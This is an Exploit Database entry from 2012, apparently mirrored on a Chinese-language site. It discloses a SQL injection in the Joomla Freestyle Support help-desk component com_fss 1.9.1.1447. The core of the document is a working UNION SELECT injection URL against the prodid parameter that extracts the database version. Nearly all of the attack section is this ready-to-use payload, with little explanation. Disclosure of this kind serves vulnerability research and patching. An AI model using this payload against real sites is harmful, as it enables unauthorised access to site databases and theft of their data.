Joomla! Component com_fss 1.9.1.1447 – SQL Injection

• Exploit Database
• 18 阅读

• 作者： D4NB4R
  日期： 2012-10-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/22097/

•  Exploit Title: Joomla Freestyle Support com_fss sqli
  
   Dork: N/A
   
   Date: [17-10-2012]
   
   Author: Daniel Barragan "D4NB4R"
   
   Twitter: @D4NB4R
   
   Vendor: http://freestyle-joomla.com
   
   Version: Version 1.9.1.1447 (last update on Oct 15, 2012)
   
   License: Commercial
  
   Download: http://freestyle-joomla.com/fssdownloads
  
   Tested on: [Linux(bt5)-Windows(7ultimate)]
  
   Especial greetz:Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt
  
  
  Descripcion joomla component: 
  
  Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.
  
  Warning: Invalid argument supplied for foreach() in 
  
  
  Exploit: 
  
  
  SQL : SQL injection
  
   http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
  
  
  _____________________________________________________
  Daniel Barragan "D4NB4R" 2012